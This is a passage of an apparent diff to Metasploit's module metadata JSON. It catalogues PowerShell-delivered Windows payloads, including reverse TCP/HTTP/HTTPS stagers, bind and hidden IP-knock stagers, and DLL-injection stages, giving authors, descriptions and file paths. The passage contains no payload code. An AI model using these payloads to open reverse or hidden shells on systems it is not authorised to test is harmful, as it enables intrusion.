", + "skape ", + "sf ", + "mihi", + "RageLtMan" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/custom/reverse_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": 
"cmd/windows/powershell", + "adapted_refname": "windows/custom/reverse_tcp_rc4", + "staged": true, + "stage_refname": "windows/custom", + "stager_refname": "windows/reverse_tcp_rc4" + }, + "payload_cmd/windows/powershell/custom/reverse_tcp_rc4_dns": { + "name": "Powershell Exec, Windows shellcode stage, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)", + "fullname": "payload/cmd/windows/powershell/custom/reverse_tcp_rc4_dns", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "bwatters-r7", + "hdm ", + "skape ", + "sf ", + "mihi", + "RageLtMan" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/custom/reverse_tcp_rc4_dns", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/custom/reverse_tcp_rc4_dns", + "staged": true, + "stage_refname": "windows/custom", + "stager_refname": "windows/reverse_tcp_rc4_dns" + }, + "payload_cmd/windows/powershell/custom/reverse_tcp_uuid": { + "name": "Powershell Exec, Windows shellcode stage, Reverse TCP Stager with UUID Support", + "fullname": "payload/cmd/windows/powershell/custom/reverse_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "bwatters-r7", + "hdm ", + "OJ Reeves" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nConnect back 
to the attacker with UUID Support", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/custom/reverse_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/custom/reverse_tcp_uuid", + "staged": true, + "stage_refname": "windows/custom", + "stager_refname": "windows/reverse_tcp_uuid" + }, + "payload_cmd/windows/powershell/custom/reverse_udp": { + "name": "Powershell Exec, Windows shellcode stage, Reverse UDP Stager with UUID Support", + "fullname": "payload/cmd/windows/powershell/custom/reverse_udp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "bwatters-r7", + "RageLtMan " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nConnect back to the attacker with UUID Support", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/custom/reverse_udp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/custom/reverse_udp", + "staged": true, + "stage_refname": "windows/custom", + "stager_refname": "windows/reverse_udp" + }, + 
"payload_cmd/windows/powershell/custom/reverse_winhttp": { + "name": "Powershell Exec, Windows shellcode stage, Windows Reverse HTTP Stager (winhttp)", + "fullname": "payload/cmd/windows/powershell/custom/reverse_winhttp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "bwatters-r7", + "hdm ", + "Borja Merino " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nTunnel communication over HTTP (Windows winhttp)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/custom/reverse_winhttp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/custom/reverse_winhttp", + "staged": true, + "stage_refname": "windows/custom", + "stager_refname": "windows/reverse_winhttp" + }, + "payload_cmd/windows/powershell/custom/reverse_winhttps": { + "name": "Powershell Exec, Windows shellcode stage, Windows Reverse HTTPS Stager (winhttp)", + "fullname": "payload/cmd/windows/powershell/custom/reverse_winhttps", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "bwatters-r7", + "hdm ", + "Borja Merino " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nTunnel communication over HTTPS (Windows winhttp)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 
16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/custom/reverse_winhttps", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/custom/reverse_winhttps", + "staged": true, + "stage_refname": "windows/custom", + "stager_refname": "windows/reverse_winhttps" + }, + "payload_cmd/windows/powershell/dllinject/bind_hidden_ipknock_tcp": { + "name": "Powershell Exec, Hidden Bind Ipknock TCP Stager", + "fullname": "payload/cmd/windows/powershell/dllinject/bind_hidden_ipknock_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "hdm ", + "skape ", + "Borja Merino " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. 
The socket will appear as \"closed,\" thus helping to\nhide the shellcode", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection", + "URL-http://www.shelliscoming.com/2014/07/ip-knock-shellcode-spoofed-ip-as.html" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/dllinject/bind_hidden_ipknock_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/dllinject/bind_hidden_ipknock_tcp", + "staged": true, + "stage_refname": "windows/dllinject", + "stager_refname": "windows/bind_hidden_ipknock_tcp" + }, + "payload_cmd/windows/powershell/dllinject/bind_hidden_tcp": { + "name": "Powershell Exec, Hidden Bind TCP Stager", + "fullname": "payload/cmd/windows/powershell/dllinject/bind_hidden_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "hdm ", + "skape ", + "Borja Merino " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection", + "URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": 
"/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/dllinject/bind_hidden_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/dllinject/bind_hidden_tcp", + "staged": true, + "stage_refname": "windows/dllinject", + "stager_refname": "windows/bind_hidden_tcp" + }, + "payload_cmd/windows/powershell/dllinject/bind_ipv6_tcp": { + "name": "Powershell Exec, Bind IPv6 TCP Stager (Windows x86)", + "fullname": "payload/cmd/windows/powershell/dllinject/bind_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "hdm ", + "skape " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for an IPv6 connection (Windows x86)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/dllinject/bind_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/dllinject/bind_ipv6_tcp", + "staged": true, + "stage_refname": "windows/dllinject", + "stager_refname": "windows/bind_ipv6_tcp" + }, + "payload_cmd/windows/powershell/dllinject/bind_ipv6_tcp_uuid": { + "name": "Powershell Exec, Bind IPv6 TCP Stager with UUID Support (Windows x86)", + 
"fullname": "payload/cmd/windows/powershell/dllinject/bind_ipv6_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "hdm ", + "skape ", + "OJ Reeves" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for an IPv6 connection with UUID Support (Windows x86)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/dllinject/bind_ipv6_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/dllinject/bind_ipv6_tcp_uuid", + "staged": true, + "stage_refname": "windows/dllinject", + "stager_refname": "windows/bind_ipv6_tcp_uuid" + }, + "payload_cmd/windows/powershell/dllinject/bind_named_pipe": { + "name": "Powershell Exec, Windows x86 Bind Named Pipe Stager", + "fullname": "payload/cmd/windows/powershell/dllinject/bind_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "UserExistsError" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a pipe connection (Windows x86)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, 
+ "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/dllinject/bind_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/dllinject/bind_named_pipe", + "staged": true, + "stage_refname": "windows/dllinject", + "stager_refname": "windows/bind_named_pipe" + }, + "payload_cmd/windows/powershell/dllinject/bind_nonx_tcp": { + "name": "Powershell Exec, Bind TCP Stager (No NX or Win7)", + "fullname": "payload/cmd/windows/powershell/dllinject/bind_nonx_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "vlad902 " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection (No NX)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/dllinject/bind_nonx_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/dllinject/bind_nonx_tcp", + "staged": true, + "stage_refname": "windows/dllinject", + "stager_refname": "windows/bind_nonx_tcp" + }, + "payload_cmd/windows/powershell/dllinject/bind_tcp": { + "name": "Powershell Exec, Bind TCP Stager (Windows x86)", + 
"fullname": "payload/cmd/windows/powershell/dllinject/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "hdm ", + "skape " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection (Windows x86)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/dllinject/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/dllinject/bind_tcp", + "staged": true, + "stage_refname": "windows/dllinject", + "stager_refname": "windows/bind_tcp" + }, + "payload_cmd/windows/powershell/dllinject/bind_tcp_rc4": { + "name": "Powershell Exec, Bind TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/cmd/windows/powershell/dllinject/bind_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "hdm ", + "skape ", + "mihi", + "RageLtMan" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": 
"/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/dllinject/bind_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/dllinject/bind_tcp_rc4", + "staged": true, + "stage_refname": "windows/dllinject", + "stager_refname": "windows/bind_tcp_rc4" + }, + "payload_cmd/windows/powershell/dllinject/bind_tcp_uuid": { + "name": "Powershell Exec, Bind TCP Stager with UUID Support (Windows x86)", + "fullname": "payload/cmd/windows/powershell/dllinject/bind_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "hdm ", + "OJ Reeves" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection with UUID Support (Windows x86)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/dllinject/bind_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/dllinject/bind_tcp_uuid", + "staged": true, + "stage_refname": "windows/dllinject", + "stager_refname": "windows/bind_tcp_uuid" + }, + "payload_cmd/windows/powershell/dllinject/find_tag": { + "name": "Powershell Exec, Find Tag Ordinal Stager", + "fullname": 
"payload/cmd/windows/powershell/dllinject/find_tag", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "skape " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nUse an established connection", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/dllinject/find_tag", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/dllinject/find_tag", + "staged": true, + "stage_refname": "windows/dllinject", + "stager_refname": "windows/findtag_ord" + }, + "payload_cmd/windows/powershell/dllinject/reverse_http": { + "name": "Powershell Exec, Windows Reverse HTTP Stager (wininet)", + "fullname": "payload/cmd/windows/powershell/dllinject/reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "hdm " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nTunnel communication over HTTP (Windows wininet)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + 
"is_install_path": true, + "ref_name": "cmd/windows/powershell/dllinject/reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/dllinject/reverse_http", + "staged": true, + "stage_refname": "windows/dllinject", + "stager_refname": "windows/reverse_http" + }, + "payload_cmd/windows/powershell/dllinject/reverse_http_proxy_pstore": { + "name": "Powershell Exec, Reverse HTTP Stager Proxy", + "fullname": "payload/cmd/windows/powershell/dllinject/reverse_http_proxy_pstore", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "hdm " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nTunnel communication over HTTP", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/dllinject/reverse_http_proxy_pstore", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/dllinject/reverse_http_proxy_pstore", + "staged": true, + "stage_refname": "windows/dllinject", + "stager_refname": "windows/reverse_http_proxy_pstore" + }, + "payload_cmd/windows/powershell/dllinject/reverse_ipv6_tcp": { + "name": "Powershell Exec, Reverse TCP Stager (IPv6)", + "fullname": "payload/cmd/windows/powershell/dllinject/reverse_ipv6_tcp", + 
"aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "hdm ", + "skape " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker over IPv6", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/dllinject/reverse_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/dllinject/reverse_ipv6_tcp", + "staged": true, + "stage_refname": "windows/dllinject", + "stager_refname": "windows/reverse_ipv6_tcp" + }, + "payload_cmd/windows/powershell/dllinject/reverse_nonx_tcp": { + "name": "Powershell Exec, Reverse TCP Stager (No NX or Win7)", + "fullname": "payload/cmd/windows/powershell/dllinject/reverse_nonx_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "vlad902 " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker (No NX)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": 
true, + "ref_name": "cmd/windows/powershell/dllinject/reverse_nonx_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/dllinject/reverse_nonx_tcp", + "staged": true, + "stage_refname": "windows/dllinject", + "stager_refname": "windows/reverse_nonx_tcp" + }, + "payload_cmd/windows/powershell/dllinject/reverse_ord_tcp": { + "name": "Powershell Exec, Reverse Ordinal TCP Stager (No NX or Win7)", + "fullname": "payload/cmd/windows/powershell/dllinject/reverse_ord_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "spoonm " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/dllinject/reverse_ord_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/dllinject/reverse_ord_tcp", + "staged": true, + "stage_refname": "windows/dllinject", + "stager_refname": "windows/reverse_ord_tcp" + }, + "payload_cmd/windows/powershell/dllinject/reverse_tcp": { + "name": "Powershell Exec, Reverse TCP Stager", + "fullname": "payload/cmd/windows/powershell/dllinject/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": 
null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "hdm ", + "skape " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/dllinject/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/dllinject/reverse_tcp", + "staged": true, + "stage_refname": "windows/dllinject", + "stager_refname": "windows/reverse_tcp" + }, + "payload_cmd/windows/powershell/dllinject/reverse_tcp_allports": { + "name": "Powershell Exec, Reverse All-Port TCP Stager", + "fullname": "payload/cmd/windows/powershell/dllinject/reverse_tcp_allports", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "hdm ", + "skape " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nTry to connect back to the attacker, on all possible ports (1-65535, slowly)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": 
"cmd/windows/powershell/dllinject/reverse_tcp_allports", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/dllinject/reverse_tcp_allports", + "staged": true, + "stage_refname": "windows/dllinject", + "stager_refname": "windows/reverse_tcp_allports" + }, + "payload_cmd/windows/powershell/dllinject/reverse_tcp_dns": { + "name": "Powershell Exec, Reverse TCP Stager (DNS)", + "fullname": "payload/cmd/windows/powershell/dllinject/reverse_tcp_dns", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "hdm ", + "skape ", + "RageLtMan" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/dllinject/reverse_tcp_dns", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/dllinject/reverse_tcp_dns", + "staged": true, + "stage_refname": "windows/dllinject", + "stager_refname": "windows/reverse_tcp_dns" + }, + "payload_cmd/windows/powershell/dllinject/reverse_tcp_rc4": { + "name": "Powershell Exec, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/cmd/windows/powershell/dllinject/reverse_tcp_rc4", + "aliases": [], + 
